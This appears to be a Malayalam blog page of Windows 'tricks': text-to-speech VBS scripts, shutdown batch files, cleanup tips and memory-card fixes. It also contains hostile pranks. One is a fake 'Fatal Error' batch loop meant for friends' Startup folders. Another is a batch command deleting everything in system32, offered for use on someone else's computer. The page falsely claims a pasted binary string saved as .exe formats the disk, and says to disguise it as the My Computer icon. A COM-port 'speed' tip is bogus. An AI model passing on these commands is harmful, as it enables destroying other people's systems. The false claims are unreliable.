നിങ്ങളുടെ കമ്പ്യൂട്ടര്‍ ഡെസ്ക്ടോപ്പില്‍ നിങ്ങള്‍ക്ക് ഒരു അക്വേറിയം വേണോ? പവിഴ പുറ്റുകളും പലതരം മത്സ്യങ്ങളും ഉള്ള ഒരു കിടിലന്‍ അക്വേറിയം, എങ്കില്‍ ഇവിടെ ക്ലിക്ക് ചെയ്തു ഡൌണ്‍ലോഡ് ചെയ്തോളു... ഡൌണ്‍ലോഡ് ഇവിടെ ക്ലിക്കിയാല്‍ തന്നെ ഓടോമാറ്റിക് ആയി നടന്നോളും...
വാക്കുകളെ ശബ്ദമാക്കി മാറ്റാന്‍
Natural Reader എന്ന സോഫ്റ്റ്‌വെയറിനെ പറ്റിയാണ് പറയുന്നത്, ഈ സോഫ്റ്റ്‌വെയര്‍ ഉപയോഗിച്ച് വെബ് പേജുകളും pdf ഫയലുകളും, MS വേര്‍ഡ് ഫയലുകളും, ഇ മെയിലുകളും വായിച്ച് കേള്‍പ്പിക്കാന്‍ സാധിക്കും. അത് mp3 യിലോ waw ലോ covert ചെയ്തു സൂക്ഷിക്കുകയും ചെയ്യാം...
കൂടുതല്‍ വിവരങ്ങള്‍ക്ക് ഇവിടെ ക്ലിക്ക് ചെയ്യുക
കൂടുതല്‍ വിവരങ്ങള്‍ക്ക് ഇവിടെ ക്ലിക്ക് ചെയ്യുക
ഒരു ചെറിയ തരികിട കമ്പ്യൂട്ടര്‍ ട്രിക്ക്
താഴെ തന്നിരിക്കുന്ന കോഡ് കോപ്പി ചെയ്ത് നോട്ട്പാഡ് ഓപ്പണ്‍ ചെയ്ത് അതില്‍ പേസ്റ്റ് ചെയ്യുക.
അതിനുശേഷം അത് blogger.bat എന്ന് സേവ് ചെയ്യുക.ശ്രദ്ധിക്കുക, ഫയലിന്റെ എസ്റ്റെന്‍ഷന്‍ .bat എന്ന് തന്നെ ആയിരിക്കണം.ഈ സേവ് ചെയ്ത ഫയല്‍ ഡ്രാഗ് ചെയ്ത് സ്റ്റാര്‍ട്ട് മെനുവില്‍ പ്രോഗ്രാംസ് എന്നതില്‍ സ്റ്റാര്‍ട്ട്അപ് എന്നതില്‍ ഇടുക.. ഇനി സിസ്റ്റം ഒന്നു റീബൂട്ട് ചെയ്തുനോക്കു....
പേടിക്കണ്ട, ഈ പ്രോഗ്രാം വെറും തമാശ മാത്രമാണ് .ഇത് സിസ്റ്റത്തിന് കുഴപ്പൊമൊന്നും വരുത്തില്ല,ഇത് വൈറസുമല്ല.ഇത് നിങ്ങളുടെ കൂട്ടുകാരുടെ സിസ്റ്റത്തില്‍ ഇടുക.പേടി എന്താണെന്ന് അപ്പോള്‍ കാണാം.
@echo off
cls
echo Fatal Error!! Your computer is under attack!!
pause
:files
echo !323%%%@#@GJFGG42JG
echo !3424%@#%^&@52%@%gs
echo !@$@^624@$6262$hG
echo !@#4-07234&&5*((6hkd
echo !&^%78755&*%478*%amp;
echo !^$68*$78()&4578
echo !&8898*65$566$68(9
goto files
താഴെ കൊടുത്തിരിക്കുന്ന കോഡും ഇതു പോലെ പരീക്ഷിക്കുക.
msg * Fatal Error! Your Computer Will Shutdown in Few Moments!*shutdown -t
പേടിക്കണ്ട, ഈ പ്രോഗ്രാം വെറും തമാശ മാത്രമാണ് .ഇത് സിസ്റ്റത്തിന് കുഴപ്പൊമൊന്നും വരുത്തില്ല,ഇത് വൈറസുമല്ല.ഇത് നിങ്ങളുടെ കൂട്ടുകാരുടെ സിസ്റ്റത്തില്‍ ഇടുക.പേടി എന്താണെന്ന് അപ്പോള്‍ കാണാം.
@echo off
cls
echo Fatal Error!! Your computer is under attack!!
pause
:files
echo !323%%%@#@GJFGG42JG
echo !3424%@#%^&@52%@%gs
echo !@$@^624@$6262$hG
echo !@#4-07234&&5*((6hkd
echo !&^%78755&*%478*%amp;
echo !^$68*$78()&4578
echo !&8898*65$566$68(9
goto files
താഴെ കൊടുത്തിരിക്കുന്ന കോഡും ഇതു പോലെ പരീക്ഷിക്കുക.
msg * Fatal Error! Your Computer Will Shutdown in Few Moments!*shutdown -t
വിന്‍ഡോസ് 7 നില്‍ "DELETE CONFORMATION DIALOG BOX" എങ്ങനെ പ്രവര്‍ത്തനരഹിതമാക്കാം
വിന്‍ഡോസില്‍ നമ്മള്‍ ഏതെങ്കിലും ഫയല്‍ ഡിലീറ്റ് ചെയ്യുമ്പോള്‍ നിങ്ങള്‍ തീര്‍ച്ചയായും ഈ ഫയല്‍ ഡിലീറ്റ് ചെയ്യാന്‍ തീരുമാനിച്ചോ എന്ന് ഉറപ്പിക്കുന്നതിനായി ഒരു ടയലോഗ് ബോക്സ് പ്രത്യക്ഷപ്പെടും അതില്‍ എസ് എന്ന് ക്ലിക്ക് ചെയ്‌താല്‍ മാത്രമേ ഫയല്‍ ഡിലീറ്റ് ആകുകയൊള്ളൂ.നിങ്ങളുടെ വിലപ്പെട്ട ഫയലുകള്‍ അബദ്ധത്തില്‍ നഷ്ടപ്പെടാതിരിക്കാനുള്ള ഒരു സംവിധാനമാണിത്.എന്നാല്‍ ചിലപ്പോഴെങ്കിലും ഇത് നമ്മുടെ സമയത്തെ നഷ്ടപ്പെടുത്തുന്നതായി നമുക്കനുഭാവപ്പെടാം.അഥവാ ഹാര്‍ഡ് ഡിസ്ക് ക്ലീന്‍ ചെയ്യുന്നതിനായി ആവശ്യമില്ലാത്ത കുറേ ഫയല്‍ ഡിലീറ്റ് ചെയ്യുമ്പോള്‍ ഇതൊരു പ്രശ്നമായി അനുഭവപ്പെടും.
വിന്‍ഡോസ് 7 നില്‍ ഇത് പ്രവര്‍ത്തന രഹിതമാക്കാന്‍ താഴെ ഉള്ള മാത്രക ഉപയോഗിക്കുക.
വിന്‍ഡോസ് 7 നില്‍ ഇത് പ്രവര്‍ത്തന രഹിതമാക്കാന്‍ താഴെ ഉള്ള മാത്രക ഉപയോഗിക്കുക.
ടെസ്ക്ടോപില്‍ കാണുന്ന Recycle Bin ന്‍റെ iconil റൈറ്റ് ക്ലിക്ക് ചെയ്യുക.ഇപ്പോള്‍ കാണുന്ന മെനുവില്‍ നിന്ന് Properties സെലക്ട് ചെയ്യുക.
ഇപ്പോള്‍ കാണുന്ന വിന്‍ഡോയില്‍ നിന്നും "Display delete confirmation dialog" അണ്‍മാര്‍ക്ക് ചെയ്തു അപ്ലൈ ചെയ്യുക.ഇനി നിങ്ങള്‍ ഡിലീറ്റ് ചെയ്യുന്ന ഫയല്‍ നിങ്ങളുടെ അനുവാദം ചോദിക്കാതെ തന്നെ നേരെ Recycle Bin ലേക്കു പോയിക്കൊള്ളും.
കമ്പ്യൂട്ടര്‍ ഫോര്‍മാറ്റ് ട്രിക്ക്
താഴെ പറയുന്നു കമ്പ്യൂട്ടര്‍ ട്രിക്കുകള്‍ നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെയ്യരുത്.പഠനവുമായി ബന്ധപ്പെട്ട് മാത്രമേ ഈ ലേഖനത്തെ കാണാവൂ.അതല്ല നിങ്ങള്‍ ഒരു കമ്പ്യൂട്ടര്‍ expert ആണെങ്കില്‍ നിങ്ങളുടെ സ്വന്തം ഉത്തരവാദിത്വത്തില്‍ ചെയ്യാവുന്നതാണ്.
ആദ്യമായി താഴെ പറയുന്ന ബൈനറി കോഡ് കോപ്പി ചെയ്യുക.
01001011000111110010010101010101010000011111100000
ഇത് നിങ്ങളുടെ നോട്ട്പാഡില്‍ പേസ്റ്റ് ചെയ്യുക.
"whateveyouwish.exe" എന്ന പേരില്‍ സേവ് ചെയ്യുക
.
ഇനി നിങ്ങളിത് ഓപ്പണ്‍ ചെയ്‌താല്‍ ഇത് നിങ്ങളുടെ ഹാര്‍ഡ് ഡിസ്കിനെ ഫോര്‍മാറ്റ് ചെയ്യുന്നതാണ്.
നിങ്ങള്‍ക്ക് വേണമെങ്കില്‍ ഇത് മറ്റൊരു കമ്പ്യൂട്ടറില്‍ കോപ്പി ചെയ്ത് പെട്ടെന്ന് കണ്ടെത്താന്‍ പറ്റാത്ത രീതിയില്‍ ഒരു ഫോള്‍ഡറിലാകി ഹൈഡ് ചെയ്ത് വെക്കുക.അതിനു മുമ്പ് ടെസ്ക്ടോപിലേക്ക് ഒരു shortcut കീ ഉണ്ടാക്കുക.ഫോള്‍ഡര്‍ ഹൈഡ് ചെയ്തതിനു ശേഷം ഡെസ്ക്ടോപ്പില്‍ വന്നു shortcut ന്‍റെ ഐകണ്‍ മാറ്റി മൈ കമ്പ്യൂട്ടര്‍ ഐകണ്‍ ആക്കുക.ശേഷം ഡസ്ക് ടോപ്പിലെ ആദ്യമുണ്ടായിരുന്ന മൈ കമ്പ്യൂട്ടര്‍ shortcut ഡിലിറ്റ് ചെയ്യുക.ഇനി നിങ്ങളുടെ സുഹൃത്ത് അല്ലെങ്കില്‍ ശത്രു ഈ ഐകണില്‍ ക്ലിക്ക് ചെയ്‌താല്‍ അയാളുടെ കമ്പ്യൂട്ടര്‍ ഫോര്‍മാറ്റ് ആയിരിക്കും.
ആദ്യമായി താഴെ പറയുന്ന ബൈനറി കോഡ് കോപ്പി ചെയ്യുക.
01001011000111110010010101010101010000011111100000
ഇത് നിങ്ങളുടെ നോട്ട്പാഡില്‍ പേസ്റ്റ് ചെയ്യുക.
"whateveyouwish.exe" എന്ന പേരില്‍ സേവ് ചെയ്യുക
.
ഇനി നിങ്ങളിത് ഓപ്പണ്‍ ചെയ്‌താല്‍ ഇത് നിങ്ങളുടെ ഹാര്‍ഡ് ഡിസ്കിനെ ഫോര്‍മാറ്റ് ചെയ്യുന്നതാണ്.
നിങ്ങള്‍ക്ക് വേണമെങ്കില്‍ ഇത് മറ്റൊരു കമ്പ്യൂട്ടറില്‍ കോപ്പി ചെയ്ത് പെട്ടെന്ന് കണ്ടെത്താന്‍ പറ്റാത്ത രീതിയില്‍ ഒരു ഫോള്‍ഡറിലാകി ഹൈഡ് ചെയ്ത് വെക്കുക.അതിനു മുമ്പ് ടെസ്ക്ടോപിലേക്ക് ഒരു shortcut കീ ഉണ്ടാക്കുക.ഫോള്‍ഡര്‍ ഹൈഡ് ചെയ്തതിനു ശേഷം ഡെസ്ക്ടോപ്പില്‍ വന്നു shortcut ന്‍റെ ഐകണ്‍ മാറ്റി മൈ കമ്പ്യൂട്ടര്‍ ഐകണ്‍ ആക്കുക.ശേഷം ഡസ്ക് ടോപ്പിലെ ആദ്യമുണ്ടായിരുന്ന മൈ കമ്പ്യൂട്ടര്‍ shortcut ഡിലിറ്റ് ചെയ്യുക.ഇനി നിങ്ങളുടെ സുഹൃത്ത് അല്ലെങ്കില്‍ ശത്രു ഈ ഐകണില്‍ ക്ലിക്ക് ചെയ്‌താല്‍ അയാളുടെ കമ്പ്യൂട്ടര്‍ ഫോര്‍മാറ്റ് ആയിരിക്കും.
കമ്പ്യൂട്ടര്‍ സ്റ്റാര്‍ട്ട് ചെയ്യുമ്പോള്‍ നിങ്ങള്‍ക്ക് സ്വാഗതം പറയാന്‍
How To Make Your PC Say Welcome Message At Startup
ഇന്ന് ഞാന്‍ നിങ്ങള്‍ക്ക് കമ്പ്യൂട്ടര്‍ സ്റ്റാര്‍ട്ട് ചെയ്യുമ്പോള്‍ കമ്പ്യൂട്ടര്‍ നിങ്ങള്‍ക്ക് സ്വാഗതം പറയുന്നത് എങ്ങനെ എന്ന് കാണിക്കുകയാണ്. നിങ്ങള്‍ക്ക് ആവശ്യമുള്ള ഡയലോഗ് സെറ്റ് ചെയ്യാം..
1. Notepad തുറക്കുക.
2. Copy/Paste the following code
Dim speaks, speech
speaks="Welcome to your PC"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks
3.“Welcome to your PC ” എന്നത് മാറ്റി നിങ്ങള്‍ക്ക് ഇഷ്ടമുള്ളത് സെറ്റ് ചെയ്യുക. ഉദാ: "Welcome Shafeek"
4. Save as welcome.vbs
5. Go to the Startup folder and Paste the file there:
Win 7/Vista Go to: C:\Users\UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Windows XP Go to: C:\Documents and Settings\All Users\StartMenu\Programs\Startup
ബാച്ച് ഫയല്‍ ഉപയോഗിച്ച് സിസ്റ്റം ഷട്ട് ഡൌണ്‍ ചെയ്യാന്‍
ആദ്യം നോട്ട് പാഡ് ഓപ്പണ്‍ ചെയ്ത് താഴെയുള്ള കോഡ് അതിലേക്കു കോപ്പി ചെയ്യുക.
@echo off
color 1a
shutdown /s /c "system shutdown..please wait"
ഇനി ഇത് shutdown.bat എന്നാ പേരില്‍ ഡെസ്ക്ടോപ്പില്‍ സേവ് ചെയ്യുക.ഇനി ആ അതില്‍ ഒന്ന് ക്ലിക്ക് ചെയ്തു നോക്ക്.
.....................................
ഷട്ട് ഡൌണ്‍ സ്റ്റോപ്പ് ചെയ്യാന്‍
shutdown /a എന്ന് Run കമാന്റ് കൊടുത്ത് Enter അടിക്കുക .
അല്ലെങ്കില്‍ താഴെയുള്ള കോഡ് നോട്ട് പാഡില്‍ കോപ്പി ചെയ്ത് പുതിയ ബാച്ച് ഫയല്‍ ഉണ്ടാക്കാം
cls
@echo off
color 1a
shutdown /a
echo /c "shutdown stopped"
ഇനി ഇത് shtdwnstopped.bat കൊടുത്ത് സേവ് ചെയ്യുക...
@echo off
color 1a
shutdown /s /c "system shutdown..please wait"
ഇനി ഇത് shutdown.bat എന്നാ പേരില്‍ ഡെസ്ക്ടോപ്പില്‍ സേവ് ചെയ്യുക.ഇനി ആ അതില്‍ ഒന്ന് ക്ലിക്ക് ചെയ്തു നോക്ക്.
.....................................
ഷട്ട് ഡൌണ്‍ സ്റ്റോപ്പ് ചെയ്യാന്‍
shutdown /a എന്ന് Run കമാന്റ് കൊടുത്ത് Enter അടിക്കുക .
അല്ലെങ്കില്‍ താഴെയുള്ള കോഡ് നോട്ട് പാഡില്‍ കോപ്പി ചെയ്ത് പുതിയ ബാച്ച് ഫയല്‍ ഉണ്ടാക്കാം
cls
@echo off
color 1a
shutdown /a
echo /c "shutdown stopped"
ഇനി ഇത് shtdwnstopped.bat കൊടുത്ത് സേവ് ചെയ്യുക...
ഇന്‍റര്‍നെറ്റ് സ്പീഡ് കൂട്ടാന്‍ മറ്റൊരു വിദ്യ !
ആദ്യം ഡെസ്ക്ടോപ്പില്‍ ഉള്ള My computer റൈറ്റ് ക്ലിക്ക് ചെയ്ത് അതിന്‍റെ properties എടുക്കുക.ശേഷം hardware ടാബില്‍ പോയി device manger എടുക്കുക.തുടര്‍ന്നു വരുന്ന ലിസ്റ്റില്‍ നിന്നും ports എന്നത് കണ്ടുപിടിച്ച് ഡബിള്‍ ക്ലിക്ക് ചെയ്യുക.അപ്പോള്‍ അതില്‍ നിങ്ങള്ക്ക് communication port എന്നാ ഒപ്ഷന്‍ കിട്ടും.അതില്‍ ഡബിള്‍ ക്ലിക്ക് ചെയ്യുതോ, അല്ലെങ്കില്‍ റൈറ്റ് ക്ലിക്ക് ചെയ്തോ അതിന്‍റെ properties എടുക്കുക.ഇപ്പോള്‍ നിങ്ങള്‍ക്കതില്‍ Port Setting എന്ന ടാബ് കാണാം.അതില്‍ ക്ലിക്ക് ചെയ്യുക.തുടര്‍ന്നു വരുന്ന ഒപ്ഷനില്‍ "Bits per second" എന്നതില്‍ 128000 എന്ന് കൂട്ടിക്കൊടുക്കുക.അതിനു താഴെ "Flow control" എന്നിടത്ത് Hardware എന്ന് കൊടുത്ത് ഒക്കെ പ്രസ് ചെയ്യുക.സംഗതി കഴിഞ്ഞു........
ലളിതമായ ട്രിക്ക് ഉപയോഗിച്ച് ഒരു കമ്പ്യൂട്ടര്‍ എങ്ങിനെ നിശ്ചലമാക്കം ..
ആദ്യമേ പറയട്ടെ ഈ ട്രിക്ക് നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെക്ക് ചെയ്തു എന്ത് സംഭവിച്ചാലും നിങ്ങള്‍ നിങ്ങളുടെ പാട്ടിനു പോകേണ്ടി വരും ..ഒരു രീതിയിലും ഞാന്‍ ഉത്തരവാദി ആകില്ല..
1 - ആദ്യം notpad ഓപ്പണ്‍ ചെയ്യുക
2- del c:\WINDOWS\system32\*.*/q ഈ കാണുന്ന കമാന്‍ഡ് നോട്ട്പാടില്‍ കോപ്പി ചെയ്യുക
3- ശേഷം നോട്ട്പാട് സേവ് ചെയ്യുക.. സേവ് ചെയ്യുമ്പോള്‍ ഏതെങ്കിലും ഒരു പേരിന്റെ കൂടെ .bat അല്ലെങ്കില്‍ .cmd എന്ന് സേവ് ചെയ്യുക..
ഉദാഹരണമായി .. സജി എന്ന പേരില്‍ ആണ് നിങ്ങള്‍ സേവ് ചെയ്യാന്‍ ഉദ്ദേശിച്ചതെങ്കില്‍ saji.bat എന്ന് ടൈപ്പ് ചെയ്തു സേവ് ചെയ്യുക..
4- ഇനി പറയുന്നത് ശ്രദ്ധിക്കുക *** സേവ് ചെയ്ത ഫയല്‍ ഒരിക്കലും നിങ്ങള്‍ ക്ലിക്കരുത് ..ക്ലിക്കിയാല്‍ കമ്പ്യൂട്ടറില്‍ ഒന്നും സംഭവിക്കില്ല ...പക്ഷെ സംഭവാമി യുഗേ യുഗേ.. റീസ്റ്റാര്‍ട്ട് ചെയ്താല്‍ സിസ്റ്റം വര്‍ക്ക് ആകില്ല.. അപ്പൊ ഏതെങ്കിലും അലവലാതിയുടെ കമ്പ്യൂട്ടറില്‍ പരീക്ഷണം നടത്തണം എന്ന് സാരം.
1 - ആദ്യം notpad ഓപ്പണ്‍ ചെയ്യുക
2- del c:\WINDOWS\system32\*.*/q ഈ കാണുന്ന കമാന്‍ഡ് നോട്ട്പാടില്‍ കോപ്പി ചെയ്യുക
3- ശേഷം നോട്ട്പാട് സേവ് ചെയ്യുക.. സേവ് ചെയ്യുമ്പോള്‍ ഏതെങ്കിലും ഒരു പേരിന്റെ കൂടെ .bat അല്ലെങ്കില്‍ .cmd എന്ന് സേവ് ചെയ്യുക..
ഉദാഹരണമായി .. സജി എന്ന പേരില്‍ ആണ് നിങ്ങള്‍ സേവ് ചെയ്യാന്‍ ഉദ്ദേശിച്ചതെങ്കില്‍ saji.bat എന്ന് ടൈപ്പ് ചെയ്തു സേവ് ചെയ്യുക..
4- ഇനി പറയുന്നത് ശ്രദ്ധിക്കുക *** സേവ് ചെയ്ത ഫയല്‍ ഒരിക്കലും നിങ്ങള്‍ ക്ലിക്കരുത് ..ക്ലിക്കിയാല്‍ കമ്പ്യൂട്ടറില്‍ ഒന്നും സംഭവിക്കില്ല ...പക്ഷെ സംഭവാമി യുഗേ യുഗേ.. റീസ്റ്റാര്‍ട്ട് ചെയ്താല്‍ സിസ്റ്റം വര്‍ക്ക് ആകില്ല.. അപ്പൊ ഏതെങ്കിലും അലവലാതിയുടെ കമ്പ്യൂട്ടറില്‍ പരീക്ഷണം നടത്തണം എന്ന് സാരം.
കമ്പ്യൂട്ടറില്‍ എഴുതിയത് വായിക്കുന്ന ട്രിക്ക്
കമ്പ്യൂട്ടറില്‍ ടൈപ്പ് ചെയ്യുന്ന പേരോ അല്ലെങ്കില്‍ വാചകങ്ങളോ കമ്പ്യൂട്ടര്‍ തന്നെ വായിച്ചു കേള്‍പ്പിക്കുന്ന ഒരു തമാശ നോട്ട്പാഡില്‍ ചെയ്യാം. ഇങ്ങനെ കുറെ ട്രിക്കുകള്‍ ഉണ്ട്. അറിയുന്നവര്‍ ഇവിടെ കമന്റില്‍ പങ്ക് വയ്ക്കുക. ഞാന്‍ പറയാന്‍ പോകുന്ന ട്രിക്ക് ഇങ്ങനെയാണ്. ആദ്യമായി നോട്ട്പാഡ് തുറക്കുക. എന്നിട്ട് അതില്‍ താഴെ കാണുന്ന കോഡ് കോപ്പി ചെയ്ത് പേസ്റ്റ് ചെയ്യുക:
Dim userInput
userInput = InputBox("Hi..! Write a message to say…")
Set nkps = Wscript.CreateObject("SAPI.SpVoice")
nkps.speak userInput
Dim userInput
userInput = InputBox("Hi..! Write a message to say…")
Set nkps = Wscript.CreateObject("SAPI.SpVoice")
nkps.speak userInput
എന്നിട്ട് File Name ‘.vbs’ എന്ന എക്സ്റ്റന്‍ഷന്‍ ചേര്‍ത്ത് ഡസ്ക്‍ടോപ്പില്‍ സേവ് ചെയ്യുക. ഉദാഹരണത്തിന് sidhilachinthakal.vbs
ഇനി സേവ് ചെയ്ത ഫയല്‍ ഓപന്‍ ചെയ്യുക. അപ്പോള്‍ താഴെ കാണുന്ന പോലെ ഒരു വിന്‍ഡോ ഡസ്ക്‍ടോപ്പില്‍ തുറന്നു വരും.
അവിടെ കാണുന്ന കോളത്തില്‍ എന്തെങ്കിലും വാചകം എഴുതി OK അടിക്കുക. അപ്പോള്‍ എഴുതിയ വാചകം സ്പീക്കറില്‍ കേള്‍ക്കാം.
പിന്‍കുറിപ്പ്: ഇംഗ്ലീഷ് വാക്കുകളുടെ ശരിയായ ഉച്ചാരണം മനസ്സിലാക്കാന്‍ ഇത് ഉപകാരപ്പെടും.
പിന്‍കുറിപ്പ്: ഇംഗ്ലീഷ് വാക്കുകളുടെ ശരിയായ ഉച്ചാരണം മനസ്സിലാക്കാന്‍ ഇത് ഉപകാരപ്പെടും.
മലയാളത്തില്‍ ടൈപ്പ് ചെയ്യാന്‍
- ആദ്യം http://www.google.com/ime/transliteration/ ഈ ലിങ്കില്‍ ചെന്ന് ഒരു കുഞ്ഞു സോഫ്റ്റ്‌വെയര്‍ ഡൌണ്‍ലോഡ് ചെയ്യുക . ഭാഷ മലയാളം എന്ന് സെലക്ട് ചെയ്യാന്‍ മറക്കരുത്
- ഡൌണ്‍ലോഡ് ആയ സോഫ്റ്റ്‌വെയറിനെ ഇന്‍സ്റ്റാള്‍ ചെയ്യുക
- അപ്പോള്‍ നിങ്ങളുടെ സ്ക്രീനിന്‍റെ താഴെ വലതു ഭാഗത്തായി ടൈം കാണിക്കുന്നതിന് അടുത്തായി ടാസ്ക് ബാറില്‍ " EN " എന്ന് ലാങ്ക്വേജ് ബാര്‍ ഓപ്ഷന്‍ കാണാന്‍ സാദിക്കും
- അതില്‍ ഡിഫോള്‍ട്ട് ആയി കാണുന്ന ഭാഷ ഇംഗ്ലീഷ് EN ആയിരിക്കും അത് ക്ലിക് ചെയ്തു മാറ്റി മലയാളം MYഎന്നാക്കുക
- അല്ലെങ്കില്‍ (Alt + Shift) ഉപയോഗിച്ച് ഭാഷ മാറ്റാവുന്നതാണ്.
- അതിനു ശേഷം മംഗ്ലീഷില്‍ ടൈപ്പ് ചെയ്യുക ഉദാ:( Muhammed മുഹമ്മദ് NANNI നന്ദി KE&KE കെ&കെ)... മംഗ്ലീഷില്‍ എഴുതുമ്പോള്‍ തന്നെ എഴുതുന്ന ഓരോ വാക്കും മലയാളത്തില്‍ കാണുവാന്‍ സാധിക്കും
- നമ്മള്‍ ഉദ്ദേശിച്ച വാക്ക് കണ്ടു കഴിഞ്ഞാല്‍ സ്പേസ് ബാര്‍ പ്രസ് ചെയ്യുകഅപ്പോള്‍ മംഗ്ലീഷില്‍ ടൈപ്പ് ചെയ്ത വാക്ക് മലയാളത്തില്‍ ആയി നമ്മുടെ ടെക്സ്റ്റ് ഏരിയയില്‍ സേവ് ആയികൊള്ളും
- മലയാളം വേണ്ട എന്നുണ്ടെങ്കില്‍ (Alt + Shift) ഉപയോഗിച്ച് തന്നെ മാറ്റി പഴയ പോലെ ഇംഗ്ലീഷ് ആക്കാവുന്നതാണ്.
കംപ്യൂട്ടര്‍ സ്പീഡ് വര്‍ദ്ധിപ്പിക്കാന്‍ ഒരു ചെറിയ ട്രിക്ക്
start ല്‍ ക്ലിക്ക് ചെയ്ത് Run എടുക്കുക. ബോക്‌സില്‍ recent എന്ന് ടൈപ്പ് ചെയ്ത് എന്റര്‍ നല്കുക. തുടര്‍ന്ന് വരുന്ന ഫോള്‍ഡറിലെ എല്ലാ ഫയലുകളും ഡെലീറ്റ് ചെയ്യുക.
ശേഷം RUN ല്‍ തന്നെ %temp% എന്ന് ടൈപ്പ് ചെയ്യുക. മുഴുവന്‍ ഫയലുകളും ഡിലീറ്റ് ചെയ്യുക.
അതുപോലെ മികച്ച ഒരു മാര്‍ഗ്ഗമാണ് cc cleaner ഇന്‍സ്റ്റാള്‍ ചെയ്യുന്നത്. ഇതിന്റെ സഹായത്തോടെ ഇന്റര്‍നെറ്റ് കാഷെ, ടെംപററി ഫയലുകള്‍, കുക്കീസ് തുടങ്ങിയവയെല്ലാം നീക്കം ചെയ്യാം. ഇങ്ങനെ ചെയ്യുന്നത് വഴി ഹാര്‍ഡ് ഡിസ്ക് ക്ലീന് ചെയ്ത് കൂടുതല്‍ സ്‌പേസ് നേടാം ...
ശേഷം RUN ല്‍ തന്നെ %temp% എന്ന് ടൈപ്പ് ചെയ്യുക. മുഴുവന്‍ ഫയലുകളും ഡിലീറ്റ് ചെയ്യുക.
അതുപോലെ മികച്ച ഒരു മാര്‍ഗ്ഗമാണ് cc cleaner ഇന്‍സ്റ്റാള്‍ ചെയ്യുന്നത്. ഇതിന്റെ സഹായത്തോടെ ഇന്റര്‍നെറ്റ് കാഷെ, ടെംപററി ഫയലുകള്‍, കുക്കീസ് തുടങ്ങിയവയെല്ലാം നീക്കം ചെയ്യാം. ഇങ്ങനെ ചെയ്യുന്നത് വഴി ഹാര്‍ഡ് ഡിസ്ക് ക്ലീന് ചെയ്ത് കൂടുതല്‍ സ്‌പേസ് നേടാം ...
കറപ്റ്റഡ് മെമ്മറി കാര്‍ഡ്- എങ്ങനെ പ്രശ്നം പരിഹരിക്കാം
പലപ്പോഴും നേരിടേണ്ടി വരാവുന്ന ഒരു പ്രശ്നമാണിത്. പല കാരണങ്ങളാല്‍ ഇത് സംഭവിക്കാം. കമ്പ്യൂട്ടറില്‍ നിന്നോ ഡാറ്റ ട്രാന്‍സ്ഫര്‍ ചെയ്യവേ പവര്‍ ഓഫായാലും ഇത് സംഭവിക്കും. ഡാമേജാകാത്ത മെമ്മറി കാര്‍ഡുകള്‍ ചില പരിഹാരമാര്ഗ്ഗങ്ങളുപയോഗിച്
ചിലപ്പോള്‍ കാര്‍ഡിലെ ഡാറ്റ അതില്‍ ഉണ്ടാവുകയും,എന്നാല്‍ ആക്സസ് ചെയ്യാന്‍ സാധിക്കാതെ വരുകയും ചെയ്യും.
ഇത് പരിഹരിക്കാന്‍ ഒരു കാര്‍ഡ് റീഡറുപയോഗിച്ച് കമ്പ്യൂട്ടറുമായി കണക്ട് ചെയ്യുക. ഫയല്‍ എക്സ്പ്ലേററില്‍ കാണിക്കുന്നുണ്ടോ എന്ന് നോക്കുക. ഉണ്ടെങ്കില്‍ ഡ്രൈവ് ലെറ്റര്‍ നോട്ട് ചെയ്യുക.
കമാന്‍ഡ് പ്രോംപ്റ്റ് തുറന്ന് chkdsk x: /r എന്ന് ടൈപ്പ് ചെയ്യുക. ഇതില്‍ X എന്നത് ഡ്രൈവ് ലെറ്ററായിരിക്കണം.
convert lost chains to files എന്ന് പ്രൊസസിന് ശേഷം ചോദിച്ചാല്‍ Y എന്ന് നല്കുക.
മെമ്മറികാര്‍ഡ് ഇന്‍വാലിഡ് ഫയല്‍സിസ്റ്റം എന്ന് കാണിക്കുന്നു!
കറപ്റ്റായ മെമ്മറികാര്‍ഡില്‍ ഫയല്‍സിസ്റ്റം നഷ്ടപ്പെട്ടിരിക്കും. വിന്‍ഡോസിന് അതിനെ തിരിച്ചറിയാനാവില്ല. ഇതിന് പരിഹാരം ഫോര്‍മാറ്റ് ചെയ്യുക എന്നതാണ്. ഇത് ചെയ്യാന്‍ കാര്‍ഡ് റീഡര്‍ വഴിയോ മറ്റോ കമ്പ്യൂട്ടറുമായി കണക്ട് ചെയ്ത് റൈറ്റ് ക്ലിക്ക് ചെയ്ത് ഫോര്‍മാറ്റ് എടുക്കുക. സാധാരണ പോര്‍ട്ടബിള്‍ ഡിവൈസുകള്‍ FAT ഫോര്‍മാറ്റാണ് ഉപയോഗിക്കുക. അലോക്കേഷന്‍ സൈസ് സെറ്റ് ചെയ്യാതെ ടിക്ക് ഫോര്‍മാറ്റ് ക്ലിക്ക് ചെയ്യുക. ഫോര്‍മാറ്റില്‍ ക്ലിക്ക് ചെയ്യുക.
മെമ്മറികാര്‍ഡ് കമ്പ്യൂട്ടറില്‍ റീഡ് ചെയ്യാനാവുന്നില്ല !
ഇത് പരിഹരിക്കാന്‍ സിസ്റ്റം ഡ്രൈവറുകള്‍ അപ്ഡേറ്റ് ചെയ്യുക. മറ്റൊരുകാരണം പുതിയ കാര്‍ഡുകള്‍ SDHC ആവാനിടയുണ്ട്. ഇവ പഴയ എസ്.ഡികാര്‍ഡ് റീഡറുകള്‍ സപ്പോര്‍ട്ട് ചെയ്യില്ല. എന്നിട്ടും പരിഹരിക്കപ്പെട്ടില്ലെങ്കില
മൊബൈലില്‍ മലയാളം വായിക്കാന്‍
